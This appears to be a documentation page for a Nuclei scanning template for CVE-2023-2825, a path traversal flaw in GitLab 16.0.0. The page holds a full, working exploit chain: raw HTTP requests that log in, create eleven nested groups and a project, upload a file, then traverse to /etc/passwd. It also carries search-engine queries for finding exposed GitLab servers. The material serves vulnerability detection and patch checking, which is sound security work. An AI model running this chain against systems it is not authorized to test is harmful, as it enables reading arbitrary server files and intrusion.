GitLab 16.0.0 - Path Traversal
ID: CVE-2023-2825
Severity: high
Author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch
Tags: cve2023,cve,gitlab,lfi,authenticated,intrusive
Description
Section titled “Description”An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups
YAML Source
Section titled “YAML Source”id: CVE-2023-2825
info: name: GitLab 16.0.0 - Path Traversal author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch severity: high description: | An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups remediation: | Upgrade GitLab to a version that is not affected by the path traversal vulnerability (CVE-2023-2825). reference: - https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/ - https://github.com/Occamsec/CVE-2023-2825 - https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2825 - https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-2825.json classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-2825 cwe-id: CWE-22 epss-score: 0.12203 epss-percentile: 0.95384 cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:* metadata: verified: true max-request: 16 vendor: gitlab product: gitlab shodan-query: - title:"Gitlab" - cpe:"cpe:2.3:a:gitlab:gitlab" - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" tags: cve2023,cve,gitlab,lfi,authenticated,intrusivevariables: data: "{{rand_base(5)}}"
http: - raw: - | GET /users/sign_in HTTP/1.1 Host: {{Hostname}} - | POST /users/sign_in HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Accept: */*
user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Accept: */*
group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | POST /groups HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}} - | @timeout: 15s POST /projects HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded
project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}} - | POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1 Host: {{Hostname}} Accept: */* X-CSRF-Token: {{x-csrf-token}} Content-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6
--0ce2a9fbe06b6da89c138a35a1765ed6 Content-Disposition: form-data; name="file"; filename="{{randstr}}"
{{randstr}} --0ce2a9fbe06b6da89c138a35a1765ed6-- - | GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: {{Hostname}} Accept: */*
host-redirects: true
matchers-condition: and matchers: - type: word words: - 726f6f743a78 encoding: hex
- type: word part: header words: - application/octet-stream - etc%2Fpasswd condition: and
extractors: - type: regex name: token_1 group: 1 regex: - name="authenticity_token" value="([A-Za-z0-9_-]+)" internal: true part: body
- type: regex name: token_2 group: 1 regex: - name="csrf\-token" content="([A-Z_0-9a-z-]+)" internal: true part: body
- type: regex name: parent_id group: 1 regex: - href="\/groups\/new\?parent_id=([0-9]+) internal: true part: body
- type: regex name: namespace_id group: 1 regex: - ref="\/projects\/new\?namespace_id=([0-9]+) internal: true part: body
- type: regex name: x-csrf-token group: 1 regex: - const headers = \{"X\-CSRF\-Token":"([a-zA-Z-0-9_]+)" internal: true part: body
- type: regex name: upload-hash group: 1 regex: - '"url":"\/uploads\/([0-9a-z]+)\/' internal: true part: body# digest: 4a0a00473045022100d301575dd91b47ae9535768b29bfe6385091c14a89943e2ed6122ca7daea1a2002200929739b5580d077129b959071fdaf24c9ef7cbee8030e95abe23868328db52d:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-2825.yaml"